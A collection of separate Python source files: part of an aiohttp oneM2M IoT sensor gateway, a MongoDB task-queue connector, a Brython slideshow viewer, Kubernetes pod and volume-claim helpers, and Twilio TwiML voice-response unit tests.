con.request('GET', uri, '', header)
response = con.getresponse()
logger.info("Request: GET/URI:" + uri)
return web.Response(status=200, body=response.read().decode().encode('utf-8'))
@asyncio.coroutine
def get_all_resources_descriptor(request):
# http://127.0.0.1:8080/~/mn-cse/mn-name/TEMPERATURE_SENSOR/DESCRIPTOR/la
uri = '/~/mn-cse/mn-name/TEMPERATURE_SENSOR/DESCRIPTOR/la'
con = http.client.HTTPConnection(DOMAIN)
header = {'X-M2M-Origin': 'admin:admin', "Content-type": "application/xml"}
con.request('GET', uri, '', header)
response = con.getresponse()
logger.info("Request: GET/URI:" + uri)
return web.Response(status=200, body=response.read().decode().encode('utf-8'))
@asyncio.coroutine
def get_all_resource_state():
app_ids = ['TEMPERATURE_SENSOR', 'AIR_HUMIDITY_SENSOR', 'LIGHT_SENSOR']
# 'http://127.0.0.1:8080/~/mn-cse/mn-name/LAMP_0/DATA/la'
all_response = '<root>'
for app_id in app_ids:
resource_uri = '/~/' + 'mn-cse/mn-name' + '/' + app_id + '/' + 'DATA' + '/' + 'la'
con = http.client.HTTPConnection(DOMAIN)
header = {'X-M2M-Origin': 'admin:admin', "Content-type": "application/xml"}
con.request('GET', resource_uri, '', header)
response = con.getresponse()
all_response += response.read().decode()
all_response += '</root>'
logger.info("Request: GET/URI:" + all_response)
return web.Response(status=200, body=all_response.encode('utf-8'))
@asyncio.coroutine
def monitor_all_register(request):
one_m2m_host = request.match_info.get('oneM2M_host')
one_m2m_uri = one_m2m_host+':'+M2M_PORT
api = 'sample'
logger.info("DOMAIN: " + DOMAIN)
logger.info("monitor_all: " + api)
for resource_id in get_all_resource_id(api=api, one_m2m_uri=one_m2m_uri):
monitor_register_one(resource_id, one_m2m_uri=one_m2m_uri)
return web.Response(status=200, body=' '.encode('utf-8'))
def get_all_resource_id(api, one_m2m_uri):
# http://127.0.0.1:8080/~/mn-cse/mn-name?fu=1&api=sample&ty=2
# <m2m:uril xmlns:m2m="http://www.onem2m.org/xml/protocols">/mn-cse/mn-name/AIR_HUMIDITY_SENSOR_1 /mn-cse/mn-name/AIR_HUMIDITY_SENSOR_2 /mn-cse/mn-name/AIR_HUMIDITY_SENSOR_3 /mn-cse/mn-name/AIR_HUMIDITY_SENSOR_4 /mn-cse/mn-name/AIR_HUMIDITY_SENSOR_5 /mn-cse/mn-name/HUMAN_APPEARANCE /mn-cse/mn-name/TEMPERATURE_SENSOR_1 /mn-cse/mn-name/TEMPERATURE_SENSOR_2 /mn-cse/mn-name/TEMPERATURE_SENSOR_3 /mn-cse/mn-name/TEMPERATURE_SENSOR_4 /mn-cse/mn-name/TEMPERATURE_SENSOR_5</m2m:uril>
resource_uri = '/~/in-cse/in-name?fu=1&api={}&ty=2'.format(api)
con = http.client.HTTPConnection(one_m2m_uri)
header = {'X-M2M-Origin': 'admin:admin'}
con.request('GET', resource_uri, None, header)
response = con.getresponse().read().decode()
string_start = '<m2m:uril xmlns:m2m="http://www.onem2m.org/xml/protocols">'
response = response[response.find(string_start) + len(string_start):response.find('</m2m:uril>')]
list_uri = response.split(' ')
return list_uri
def monitor_register_one(resource_uri, one_m2m_uri):
resource_uri = '/~' + resource_uri + '/DATA'
con = http.client.HTTPConnection(one_m2m_uri)
header = {'X-M2M-Origin': 'admin:admin', "Content-type": "application/xml;ty=23", "X-M2M-NM": "SUB_MY_SENSOR",
"Connection": "close"}
body = """
<m2m:sub xmlns:m2m="http://www.onem2m.org/xml/protocols">
<nu>http://{host}:{port}/monitor</nu>
<nct>2</nct>
</m2m:sub>
""".format(host=HOST_NAME, port=PORT)
con.request('POST', resource_uri, body.encode('utf-8'), header)
# response = con.getresponse()
logger.info("Monitor: " + resource_uri)
@asyncio.coroutine
def monitor_register(request):
app_id = request.match_info.get('app_id')
resource_uri = '/~/' + 'mn-cse/mn-name' + '/' + app_id + '/' + 'DATA'
con = http.client.HTTPConnection(DOMAIN)
header = {'X-M2M-Origin': 'admin:admin', "Content-type": "application/xml;ty=23", "X-M2M-NM": "SUB_MY_SENSOR_2",
"Connection": "close"}
body = """
<m2m:sub xmlns:m2m="http://www.onem2m.org/xml/protocols">
<nu>http://{host}:{port}/monitor</nu>
<nct>2</nct>
</m2m:sub>
""".format(host=HOST, port=PORT)
con.request('POST', resource_uri, body.encode('utf-8'), header)
response = con.getresponse()
logger.info("Register monitor" + str(response.read().decode()))
return web.Response(status=200, body='watting'.encode('utf-8'))
@asyncio.coroutine
def get_resource_description(request):
app_id = request.match_info.get('app_id')
# http://127.0.0.1:8080/~/mn-cse/mn-name/MY_SENSOR/DESCRIPTOR/ol
resource_uri = '/~/' + 'mn-cse/mn-name' + '/' + app_id + '/' + 'DESCRIPTOR' + '/' + 'la'
con = http.client.HTTPConnection(DOMAIN)
header = {'X-M2M-Origin': 'admin:admin', "Content-type": "application/xml"}
con.request('GET', resource_uri, '', header)
response = con.getresponse()
logger.info("Request: GET/URI:" + resource_uri)
return web.Response(status=200, body=response.read().decode().encode('utf-8'))
@asyncio.coroutine
def switchON(request):
time_delay = request.match_info.get('timeDelay')
# /mn-cse/mn-name/TEMPERATURE_SENSOR?appId=TEMPERATURE_SENSOR&op=switchOn&timeDelay=0
app_ids = ['TEMPERATURE_SENSOR', 'AIR_HUMIDITY_SENSOR', 'LIGHT_SENSOR']
for app_id in app_ids:
resource_uri = '/~/' + 'mn-cse/mn-name/' + app_id + '?appId=' + app_id + '&op=switchOn&timeDelay=' + str(
time_delay)
con = http.client.HTTPConnection(DOMAIN)
header = {'X-M2M-Origin': 'admin:admin', "Content-type": "application/xml", "Connection": "close"}
con.request('POST', resource_uri, '', header)
# response = con.getresponse()
# all_response += response.read().decode()
all_response = 'waitting!'
logger.info("Request: GET/URI:" + resource_uri)
return web.Response(status=200, body=all_response.encode('utf-8'))
@asyncio.coroutine
def switchOFF(request):
time_delay = request.match_info.get('timeDelay')
# /mn-cse/mn-name/TEMPERATURE_SENSOR?appId=TEMPERATURE_SENSOR&op=switchOn&timeDelay=0
app_ids = ['TEMPERATURE_SENSOR', 'AIR_HUMIDITY_SENSOR', 'LIGHT_SENSOR']
all_response = ''
for app_id in app_ids:
resource_uri = '/~/' + 'mn-cse/mn-name/' + app_id + '?appId=' + app_id + '&op=switchOff&timeDelay=' + str(
time_delay)
con = http.client.HTTPConnection(DOMAIN)
header = {'X-M2M-Origin': 'admin:admin', "Content-type": "application/xml", "Connection": "close"}
con.request('POST', resource_uri, '', header)
# response = con.getresponse()
# all_response += response.read().decode()
all_response = 'waitting!'
logger.info("Request: GET/URI:" + resource_uri)
return web.Response(status=200, body=all_response.encode('utf-8'))
@asyncio.coroutine
def monitor(request):
data = yield from request.text()
data = data.replace('<', '<').replace('"', '"')
start_index = data.find('<obj>')
end_index = data.find('</obj>')
raw_data = data[start_index - 1:end_index + len('</obj>') + 1]
logger.info(raw_data)
if cloudAMPQclient.publish_message(data):
logger.info('---> Publish message to CloudAMPQ')
else:
logger.info('---> Cant connect to AMPQ server')
logger.info('---> Store data to influxdb')
# influxdb_client.store_data(raw_data)
logger.info('---> Export data to prometheus')
prometheus_client.export_data(xml_data=raw_data)
return web.Response(status=200, body=' '.encode('utf-8'))
# <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
# <obj>
# <str val="TEMPERATURE_SENSOR" name="appId"/>
# <str val="temperature" name="category"/>
# <int val="73" name="data"/>
# <str val="celsius" name="unit"/>
# </obj>
@asyncio.coroutine
def tracking(request):
logger.info('---> Cosume message from CloudAMPQ')
message = cloudAMPQclient.consume_message()
return web.Response(status=200, body=message.encode('utf-8'))
@asyncio.coroutine
def init(loop):
app = web.Application(loop=loop)
# Get resource description
app.router.add_route('GET', '/resource/{app_id}/descriptor', get_resource_description)
# Get resource state
app.router.add_route('GET', '/resource/{app_id}/state', get_resource_state)
# Get resources state
app.router.add_route('GET', '/resource/all/state', get_all_resource_state)
# Switch on all resource
app.router.add_route('GET', '/all/resource/switchON?timeDelay={timeDelay}', switchON)
# Switch off all resource
app.router.add_route('GET', '/all/resource/switchOFF?timeDelay={timeDelay}', switchOFF)
app.router.add_route('POST', '/monitor', monitor)
app.router.add_route('GET', '/{oneM2M_host}/monitor/all/register', monitor_all_register)
app.router.add_route('GET', '/monitor/register/{app_id}', monitor_register)
srv = yield from loop.create_server(app.make_handler(), HOST, PORT)
print("Server started at " + HOST + ":" + str(PORT))
return srv
loop = asyncio.get_event_loop()
loop.run_until_complete(init(loop))
try:
loop.run_forever()
except KeyboardInterrupt:
pass
| |
import pymongo
from . import _connector
class Connector(
_connector.Connector,
):
name = 'mongo'
def __init__(
self,
mongodb_uri,
):
super().__init__()
self.mongodb_uri = mongodb_uri
self.connection = pymongo.MongoClient(
host=mongodb_uri,
)
self.connection.tasker.task_queue.create_index(
keys=[
(
'queue_name',
pymongo.DESCENDING,
),
(
'priority',
pymongo.ASCENDING,
),
],
background=True,
)
self.connection.tasker.results.create_index(
keys=[
(
'value',
pymongo.ASCENDING,
),
],
background=True,
)
def key_set(
self,
key,
value,
):
update_one_result = self.connection.tasker.results.update_one(
filter={
'key': key,
},
update={
'$set': {
'key': key,
'value': value,
},
},
upsert=True,
)
if update_one_result.upserted_id is not None:
return True
else:
return False
def key_get(
self,
key,
):
document = self.connection.tasker.results.find_one(
filter={
'key': key,
},
)
if document:
return document['value']
else:
return None
def key_delete(
self,
key,
):
delete_one_result = self.connection.tasker.results.delete_one(
filter={
'key': key,
},
)
return delete_one_result.deleted_count > 0
def queue_pop(
self,
queue_name,
):
document = self.connection.tasker.task_queue.find_one_and_delete(
filter={
'queue_name': queue_name,
},
projection={
'value': 1,
},
sort=[
(
'priority',
pymongo.ASCENDING,
),
],
)
if document:
return document['value']
else:
return None
def queue_pop_bulk(
self,
queue_name,
number_of_items,
):
documents = []
for i in range(number_of_items):
document = self.connection.tasker.task_queue.find_one_and_delete(
filter={
'queue_name': queue_name,
},
projection={
'value': 1,
},
sort=[
(
'priority',
pymongo.ASCENDING,
),
],
)
if document:
documents.append(document['value'])
else:
break
return documents
def queue_push(
self,
queue_name,
item,
priority='NORMAL',
):
if priority == 'HIGH':
priority_value = 0
elif priority == 'NORMAL':
priority_value = 1
insert_one_result = self.connection.tasker.task_queue.insert_one(
document={
'queue_name': queue_name,
'priority': priority_value,
'value': item,
}
)
return insert_one_result.acknowledged
def queue_push_bulk(
self,
queue_name,
items,
priority='NORMAL',
):
if priority == 'HIGH':
priority_value = 0
elif priority == 'NORMAL':
priority_value = 1
insert_many_result = self.connection.tasker.task_queue.insert_many(
documents=[
{
'queue_name': queue_name,
'priority': priority_value,
'value': item,
}
for item in items
]
)
return insert_many_result.acknowledged
def queue_length(
self,
queue_name,
):
queue_length = self.connection.tasker.task_queue.count_documents(
filter={
'queue_name': queue_name,
},
)
return queue_length
def queue_delete(
self,
queue_name,
):
result = self.connection.tasker.task_queue.delete_many(
filter={
'queue_name': queue_name,
},
)
return result.deleted_count
def __getstate__(
self,
):
state = {
'mongodb_uri': self.mongodb_uri,
}
return state
def __setstate__(
self,
value,
):
self.__init__(
mongodb_uri=value['mongodb_uri'],
)
| |
from browser import document, html, window
import markdown
import highlight
def escape(html):
html = html.replace('<', '<')
html = html.replace('>', '>')
return html
def _keydown(ev, path, zone, page):
if ev.keyCode in [39, 40]: # key right or down : next page
show(path, zone, page + 1)
ev.preventDefault()
elif ev.keyCode in [37, 38]: #key left or up: previous page
show(path, zone, page - 1)
ev.preventDefault()
def keydown(ev, slideshow, zone):
if ev.keyCode in [39, 40]: # key right or down : next page
slideshow.page_num += 1
if slideshow.page_num >= len(slideshow.pages):
slideshow.page_num = 0
show_page(slideshow, zone, slideshow.page_num)
ev.preventDefault()
elif ev.keyCode in [37, 38]: #key left or up: previous page
slideshow.page_num -= 1
if slideshow.page_num < 0:
slideshow.page_num = len(slideshow.pages) - 1
show_page(slideshow, zone, slideshow.page_num)
ev.preventDefault()
def move_to(ev, slideshow, zone):
pc = (ev.x - ev.target.abs_left) / ev.target.width
nb_pages = len(slideshow.pages) - 1
page = round(nb_pages * pc)
slideshow.page_num = page
new_pos = '%spx' %(ev.x -ev.target.abs_left -
(document['tl_pos'].width / 2))
# show page at specified position
show_page(slideshow, zone, page)
# set new cursor position
document['tl_pos'].style.left = new_pos
def click_on_tl_pos(ev):
# don't move if user clicks on current timeline position
ev.stopPropagation()
class Slideshow:
def __init__(self, path):
qs = window.Date.new().getTime()
self.src = src = open(path+'?foo=%s' %qs).read()
self.title = ''
self.show_page_num = False
# table of contents : matches matter with page number
self.contents = []
# directives for the document
while src.startswith('@'):
line_end = src.find('\n')
key,value = src[:line_end].split(' ', 1)
if key=='@title':
self.title = value
elif key=='@pagenum':
self.show_page_num = True
elif key=="@index":
self.contents.append([value, 0])
src = src[line_end + 1:]
self.pages = []
lines = []
for line in src.split('\n'):
if line.startswith('../..'):
self.pages.append('\n'.join(lines))
lines = []
elif line.startswith('@pause'):
self.pages.append('\n'.join(lines))
elif line.startswith('@index'):
self.contents.append([line.split(' ', 1)[1], len(self.pages)])
else:
lines.append(line)
if lines:
self.pages.append('\n'.join(lines))
def show(path, zone, page_num=None):
slideshow = Slideshow(path)
if page_num is None:
page_num = 0
# check if page num was stored in a cookie
cookies = document.cookie
if cookies:
elts = dict([x.strip() for x in cookie.split('=')]
for cookie in cookies.split(";"))
if "page" in elts:
page_num = int(elts["page"])
if page_num < 0:
page_num = 0
elif page_num >= len(slideshow.pages):
page_num = len(slideshow.pages) - 1
slideshow.page_num = page_num
document.unbind('keydown')
document.bind('keydown',lambda ev:keydown(ev, slideshow, zone))
show_page(slideshow, zone, page_num)
def run_code(ev):
print(ev.target.text)
def show_page(slideshow, zone, page_num):
# if table of contents is not empty, add it
if slideshow.contents:
toc = html.SELECT(name="toc")
toc.bind('change', lambda ev: show_page(slideshow, zone,
int(ev.target.options[ev.target.selectedIndex].value)))
for content in slideshow.contents:
toc <= html.OPTION(content[0], value=content[1],
selected=page_num>=content[1])
slideshow.page_num = int(page_num)
# store page num in a cookie
document.cookie = "page={}".format(page_num)
zone.clear()
body = html.DIV()
body.html = markdown.mark(slideshow.pages[page_num])[0]
wh = window.innerHeight
fontSize = int(18 * window.innerHeight / 800)
body.style.fontSize = "{}px".format(fontSize)
if slideshow.contents:
body = html.DIV(toc + body)
footer = html.DIV(Id="footer")
footer.style.fontSize = "{}px".format(fontSize)
if slideshow.title:
footer <= html.DIV(slideshow.title,style=dict(display='inline'))
if slideshow.show_page_num:
footer <= html.SPAN(' (%s/%s)' %(page_num+1, len(slideshow.pages)),
style=dict(display='inline'))
timeline = html.DIV(Id='timeline')
timeline.style.height = "{}px".format(int(fontSize/2))
tl_pos = html.DIV(Id='tl_pos')
timeline <= tl_pos
timeline.bind('click', lambda ev:move_to(ev, slideshow, zone))
tl_pos.bind('click', click_on_tl_pos)
zone <= body + footer + timeline
wh = window.innerHeight
tl_pos.style.left = '%spx' %(timeline.width*page_num/len(slideshow.pages))
document["cours"].style.minHeight = "{}px".format(int(wh * 0.9))
for elt in zone.get(selector='.python'):
src = elt.text.strip()
width = max(len(line) for line in src.split('\n'))
width = max(width, 30)
# replace element content by highlighted code
elt.html = highlight.highlight(src).html
elt.style.width = '%sem' %int(0.7*width)
elt.bind('click', run_code)
for elt in zone.get(selector='.python-console'):
src = elt.text.strip()
lines = src.split('\n')
result = ''
py = ''
py_starts = []
for line in lines:
if line.startswith('>>>') or line.startswith('...'):
py += line[4:]+'\n'
py_starts.append('<span class="python-prompt">{}</span>'.format(line[:3]))
else:
if py:
colored = highlight.highlight(py).html
colored_lines = colored.split('\n')
if result:
result += '\n'
result += '\n'.join(start+' '+line
for (start, line) in zip(py_starts, colored_lines))
py = ''
py_starts = []
else:
line = escape(line)
result += '\n' + line
if py:
colored = highlight.highlight(py).html
colored_lines = colored.split('\n')
if result:
result += '\n'
result += '\n'.join(start+' '+line
for (start, line) in zip(py_starts, colored_lines))
py = ''
py_starts = []
elt.html = result
| |
"""
Helper methods for generating k8s API objects.
"""
from kubernetes.client.models.v1_pod import V1Pod
from kubernetes.client.models.v1_pod_spec import V1PodSpec
from kubernetes.client.models.v1_object_meta import V1ObjectMeta
from kubernetes.client.models.v1_pod_security_context import V1PodSecurityContext
from kubernetes.client.models.v1_local_object_reference import V1LocalObjectReference
from kubernetes.client.models.v1_volume import V1Volume
from kubernetes.client.models.v1_volume_mount import V1VolumeMount
from kubernetes.client.models.v1_container import V1Container
from kubernetes.client.models.v1_security_context import V1SecurityContext
from kubernetes.client.models.v1_container_port import V1ContainerPort
from kubernetes.client.models.v1_env_var import V1EnvVar
from kubernetes.client.models.v1_resource_requirements import V1ResourceRequirements
from kubernetes.client.models.v1_persistent_volume_claim import V1PersistentVolumeClaim
from kubernetes.client.models.v1_persistent_volume_claim_spec import V1PersistentVolumeClaimSpec
def make_pod(
name,
image_spec,
image_pull_policy,
image_pull_secret,
port,
cmd,
node_selector,
run_as_uid,
fs_gid,
run_privileged,
env,
working_dir,
volumes,
volume_mounts,
labels,
cpu_limit,
cpu_guarantee,
mem_limit,
mem_guarantee,
lifecycle_hooks,
init_containers,
service_account,
):
"""
Make a k8s pod specification for running a user notebook.
Parameters:
- name:
Name of pod. Must be unique within the namespace the object is
going to be created in. Must be a valid DNS label.
- image_spec:
Image specification - usually a image name and tag in the form
of image_name:tag. Same thing you would use with docker commandline
arguments
- image_pull_policy:
Image pull policy - one of 'Always', 'IfNotPresent' or 'Never'. Decides
when kubernetes will check for a newer version of image and pull it when
running a pod.
- image_pull_secret:
Image pull secret - Default is None -- set to your secret name to pull
from private docker registry.
- port:
Port the notebook server is going to be listening on
- cmd:
The command used to execute the singleuser server.
- node_selector:
Dictionary Selector to match nodes where to launch the Pods
- run_as_uid:
The UID used to run single-user pods. The default is to run as the user
specified in the Dockerfile, if this is set to None.
- fs_gid
The gid that will own any fresh volumes mounted into this pod, if using
volume types that support this (such as GCE). This should be a group that
the uid the process is running as should be a member of, so that it can
read / write to the volumes mounted.
- run_privileged:
Whether the container should be run in privileged mode.
- env:
Dictionary of environment variables.
- volumes:
List of dictionaries containing the volumes of various types this pod
will be using. See k8s documentation about volumes on how to specify
these
- volume_mounts:
List of dictionaries mapping paths in the container and the volume(
specified in volumes) that should be mounted on them. See the k8s
documentaiton for more details
- working_dir:
String specifying the working directory for the notebook container
- labels:
Labels to add to the spawned pod.
- cpu_limit:
Float specifying the max number of CPU cores the user's pod is
allowed to use.
- cpu_guarentee:
Float specifying the max number of CPU cores the user's pod is
guaranteed to have access to, by the scheduler.
- mem_limit:
String specifying the max amount of RAM the user's pod is allowed
to use. String instead of float/int since common suffixes are allowed
- mem_guarantee:
String specifying the max amount of RAM the user's pod is guaranteed
to have access to. String ins loat/int since common suffixes
are allowed
- lifecycle_hooks:
Dictionary of lifecycle hooks
- init_containers:
List of initialization containers belonging to the pod.
- service_account:
Service account to mount on the pod. None disables mounting
"""
pod = V1Pod()
pod.kind = "Pod"
pod.api_version = "v1"
pod.metadata = V1ObjectMeta()
pod.metadata.name = name
pod.metadata.labels = labels.copy()
pod.spec = V1PodSpec()
security_context = V1PodSecurityContext()
if fs_gid is not None:
security_context.fs_group = int(fs_gid)
if run_as_uid is not None:
security_context.run_as_user = int(run_as_uid)
pod.spec.security_context = security_context
if image_pull_secret is not None:
pod.spec.image_pull_secrets = []
image_secret = V1LocalObjectReference()
image_secret.name = image_pull_secret
pod.spec.image_pull_secrets.append(image_secret)
if node_selector:
pod.spec.node_selector = node_selector
pod.spec.containers = []
notebook_container = V1Container()
notebook_container.name = "notebook"
notebook_container.image = image_spec
notebook_container.working_dir = working_dir
notebook_container.ports = []
port_ = V1ContainerPort()
port_.name = "notebook-port"
port_.container_port = port
notebook_container.ports.append(port_)
notebook_container.env = [V1EnvVar(k, v) for k, v in env.items()]
notebook_container.args = cmd
notebook_container.image_pull_policy = image_pull_policy
notebook_container.lifecycle = lifecycle_hooks
notebook_container.resources = V1ResourceRequirements()
if service_account is None:
# Add a hack to ensure that no service accounts are mounted in spawned pods
# This makes sure that we don"t accidentally give access to the whole
# kubernetes API to the users in the spawned pods.
# Note: We don't simply use `automountServiceAccountToken` here since we wanna be compatible
# with older kubernetes versions too for now.
hack_volume = V1Volume()
hack_volume.name = "no-api-access-please"
hack_volume.empty_dir = {}
hack_volumes = [hack_volume]
hack_volume_mount = V1VolumeMount()
hack_volume_mount.name = "no-api-access-please"
hack_volume_mount.mount_path = "/var/run/secrets/kubernetes.io/serviceaccount"
hack_volume_mount.read_only = True
hack_volume_mounts = [hack_volume_mount]
else:
hack_volumes = []
hack_volume_mounts = []
pod.service_account_name = service_account
if run_privileged:
container_security_context = V1SecurityContext()
container_security_context.privileged = True
notebook_container.security_context = container_security_context
notebook_container.resources.requests = {}
if cpu_guarantee:
notebook_container.resources.requests['cpu'] = cpu_guarantee
if mem_guarantee:
notebook_container.resources.requests['memory'] = mem_guarantee
notebook_container.resources.limits = {}
if cpu_limit:
notebook_container.resources.limits['cpu'] = cpu_limit
if mem_limit:
notebook_container.resources.limits['memory'] = mem_limit
notebook_container.volume_mounts = volume_mounts + hack_volume_mounts
pod.spec.containers.append(notebook_container)
pod.spec.init_containers = init_containers
pod.spec.volumes = volumes + hack_volumes
return pod
def make_pvc(
name,
storage_class,
access_modes,
storage,
labels
):
"""
Make a k8s pvc specification for running a user notebook.
Parameters:
- name:
Name of persistent volume claim. Must be unique within the namespace the object is
going to be created in. Must be a valid DNS label.
- storage_class
String of the name of the k8s Storage Class to use.
- access_modes:
A list of specifying what access mode the pod should have towards the pvc
- storage
The ammount of storage needed for the pvc
"""
pvc = V1PersistentVolumeClaim()
pvc.kind = "PersistentVolumeClaim"
pvc.api_version = "v1"
pvc.metadata = V1ObjectMeta()
pvc.metadata.name = name
pvc.metadata.annotations = {}
if storage_class:
pvc.metadata.annotations.update({"volume.beta.kubernetes.io/storage-class": storage_class})
pvc.metadata.labels = {}
pvc.metadata.labels.update(labels)
pvc.spec = V1PersistentVolumeClaimSpec()
pvc.spec.access_modes = access_modes
pvc.spec.resources = V1ResourceRequirements()
pvc.spec.resources.requests = {"storage": storage}
return pvc
| |
# -*- coding: utf-8 -*-
from tests.unit.twiml import TwilioTest
from twilio.twiml.voice_response import VoiceResponse, Dial, Enqueue, Gather
class TestResponse(TwilioTest):
def test_empty_response(self):
r = VoiceResponse()
assert (self.strip(r) == '<?xml version="1.0" encoding="UTF-8"?><Response />')
def test_response(self):
r = VoiceResponse()
r.hangup()
r.leave()
r.sms(
'twilio sms',
to='+11234567890',
from_='+10987654321'
)
assert self.strip(r) == \
'<?xml version="1.0" encoding="UTF-8"?><Response><Hangup /><Leave />' \
'<Sms from="+10987654321" to="+11234567890">twilio sms</Sms></Response>'
def test_response_chain(self):
with VoiceResponse() as r:
r.hangup()
r.leave()
r.sms(
'twilio sms',
to='+11234567890',
from_='+10987654321'
)
assert self.strip(r) == \
'<?xml version="1.0" encoding="UTF-8"?><Response><Hangup /><Leave />' \
'<Sms from="+10987654321" to="+11234567890">twilio sms</Sms></Response>'
def test_nested_verbs(self):
with VoiceResponse() as r:
with r.gather() as g:
g.say('Hello', voice='man')
assert self.strip(r) == \
'<?xml version="1.0" encoding="UTF-8"?><Response><Gather><Say voice="man">Hello</Say></Gather></Response>'
class TestSay(TwilioTest):
def test_empty_say(self):
""" should be a say with no text """
r = VoiceResponse()
r.say('')
assert self.strip(r) == \
'<?xml version="1.0" encoding="UTF-8"?><Response><Say /></Response>'
def test_say_hello_world(self):
""" should say hello world """
r = VoiceResponse()
r.say('Hello World')
assert self.strip(r) == \
'<?xml version="1.0" encoding="UTF-8"?><Response><Say>Hello World</Say></Response>'
def test_say_french(self):
""" should say hello monkey """
r = VoiceResponse()
r.say('n\xe9cessaire et d\'autres')
assert self.strip(r) == \
'<?xml version="1.0" encoding="UTF-8"?><Response><Say>nécessaire et d\'autres</Say></Response>'
def test_say_loop(self):
""" should say hello monkey and loop 3 times """
r = VoiceResponse()
r.say('Hello Monkey', loop=3)
assert self.strip(r) == \
'<?xml version="1.0" encoding="UTF-8"?><Response><Say loop="3">Hello Monkey</Say></Response>'
def test_say_loop_gb(self):
""" should say have a woman say hello monkey and loop 3 times """
r = VoiceResponse()
r.say('Hello Monkey', language='en-gb')
assert self.strip(r) == \
'<?xml version="1.0" encoding="UTF-8"?><Response><Say language="en-gb">Hello Monkey</Say></Response>'
def test_say_loop_woman(self):
""" should say have a woman say hello monkey and loop 3 times """
r = VoiceResponse()
r.say('Hello Monkey', loop=3, voice='woman')
assert self.strip(r) == \
'<?xml version="1.0" encoding="UTF-8"?><Response><Say loop="3" voice="woman">Hello Monkey</Say></Response>'
def test_say_all(self):
""" convenience method: should say have a woman say hello monkey and loop 3 times and be in french """
r = VoiceResponse()
r.say('Hello Monkey', loop=3, voice='man', language='fr')
assert self.strip(r) == \
'<?xml version="1.0" encoding="UTF-8"?><Response><Say language="fr" loop="3" voice="man">' \
'Hello Monkey</Say></Response>'
class TestPlay(TwilioTest):
def test_empty_play(self):
""" should play hello monkey """
r = VoiceResponse()
r.play()
assert self.strip(r) == \
'<?xml version="1.0" encoding="UTF-8"?><Response><Play /></Response>'
def test_play_hello(self):
""" should play hello monkey """
r = VoiceResponse()
r.play(url='http://hellomonkey.mp3')
assert self.strip(r) == \
'<?xml version="1.0" encoding="UTF-8"?><Response><Play>http://hellomonkey.mp3</Play></Response>'
def test_play_hello_loop(self):
""" should play hello monkey loop """
r = VoiceResponse()
r.play(url='http://hellomonkey.mp3', loop=3)
assert self.strip(r) == \
'<?xml version="1.0" encoding="UTF-8"?><Response><Play loop="3">http://hellomonkey.mp3</Play></Response>'
def test_play_digits(self):
""" should play digits """
r = VoiceResponse()
r.play(digits='w123')
assert self.strip(r) == \
'<?xml version="1.0" encoding="UTF-8"?><Response><Play digits="w123" /></Response>'
class TestRecord(TwilioTest):
def test_record_empty(self):
""" should record """
r = VoiceResponse()
r.record()
assert self.strip(r) == \
'<?xml version="1.0" encoding="UTF-8"?><Response><Record /></Response>'
def test_record_action_method(self):
""" should record with an action and a get method """
r = VoiceResponse()
r.record(action='example.com', method='GET')
assert self.strip(r) == \
'<?xml version="1.0" encoding="UTF-8"?><Response><Record action="example.com" method="GET" /></Response>'
def test_record_max_length_finish_timeout(self):
""" should record with an maxLength, finishOnKey, and timeout """
r = VoiceResponse()
r.record(timeout=4, finish_on_key='#', max_length=30)
assert self.strip(r) == \
'<?xml version="1.0" encoding="UTF-8"?><Response><Record finishOnKey="#" maxLength="30" timeout="4" /></Response>'
def test_record_transcribe(self):
""" should record with a transcribe and transcribeCallback """
r = VoiceResponse()
r.record(transcribe_callback='example.com')
assert self.strip(r) == \
'<?xml version="1.0" encoding="UTF-8"?><Response><Record transcribeCallback="example.com" /></Response>'
class TestRedirect(TwilioTest):
def test_redirect_empty(self):
r = VoiceResponse()
r.redirect('')
assert self.strip(r) == \
'<?xml version="1.0" encoding="UTF-8"?><Response><Redirect /></Response>'
def test_redirect_method(self):
r = VoiceResponse()
r.redirect('example.com', method='POST')
assert self.strip(r) == \
'<?xml version="1.0" encoding="UTF-8"?><Response><Redirect method="POST">example.com</Redirect></Response>'
def test_redirect_method_params(self):
r = VoiceResponse()
r.redirect('example.com?id=34&action=hey', method='POST')
assert self.strip(r) == \
'<?xml version="1.0" encoding="UTF-8"?><Response>' \
'<Redirect method="POST">example.com?id=34&action=hey</Redirect></Response>'
class TestHangup(TwilioTest):
def test_hangup(self):
""" convenience: should Hangup to a url via POST """
r = VoiceResponse()
r.hangup()
assert self.strip(r) == \
'<?xml version="1.0" encoding="UTF-8"?><Response><Hangup /></Response>'
class TestLeave(TwilioTest):
def test_leave(self):
""" convenience: should Hangup to a url via POST """
r = VoiceResponse()
r.leave()
assert self.strip(r) == \
'<?xml version="1.0" encoding="UTF-8"?><Response><Leave /></Response>'
class TestReject(TwilioTest):
def test_reject(self):
""" should be a Reject with default reason """
r = VoiceResponse()
r.reject()
assert self.strip(r) == \
'<?xml version="1.0" encoding="UTF-8"?><Response><Reject /></Response>'
class TestSms(TwilioTest):
def test_empty(self):
""" Test empty sms verb """
r = VoiceResponse()
r.sms('')
assert self.strip(r) == \
'<?xml version="1.0" encoding="UTF-8"?><Response><Sms /></Response>'
def test_body(self):
""" Test hello world """
r = VoiceResponse()
r.sms('Hello, World')
assert self.strip(r) == \
'<?xml version="1.0" encoding="UTF-8"?><Response><Sms>Hello, World</Sms></Response>'
def test_to_from_action(self):
""" Test the to, from, and status callback """
r = VoiceResponse()
r.sms('Hello, World', to=1231231234, from_=3453453456, status_callback='example.com?id=34&action=hey')
assert self.strip(r) == \
'<?xml version="1.0" encoding="UTF-8"?><Response>' \
'<Sms from="3453453456" statusCallback="example.com?id=34&action=hey" to="1231231234">' \
'Hello, World</Sms></Response>'
def test_action_method(self):
""" Test the action and method parameters on Sms """
r = VoiceResponse()
r.sms('Hello', method='POST', action='example.com?id=34&action=hey')
assert self.strip(r) == \
'<?xml version="1.0" encoding="UTF-8"?><Response>' \
'<Sms action="example.com?id=34&action=hey" method="POST">Hello</Sms></Response>'
class TestConference(TwilioTest):
def test_conference(self):
d = Dial()
d.conference(
'TestConferenceAttributes',
beep=False,
wait_url='',
start_conference_on_enter=True,
end_conference_on_exit=True
)
r = VoiceResponse()
r.append(d)
assert self.strip(r) == \
'<?xml version="1.0" encoding="UTF-8"?><Response><Dial>' \
'<Conference beep="false" endConferenceOnExit="true" startConferenceOnEnter="true" waitUrl="">' \
'TestConferenceAttributes</Conference></Dial></Response>'
def test_muted_conference(self):
d = Dial()
d.conference(
'TestConferenceMutedAttribute',
beep=False,
muted=True,
wait_url='',
start_conference_on_enter=True,
end_conference_on_exit=True
)
r = VoiceResponse()
r.append(d)
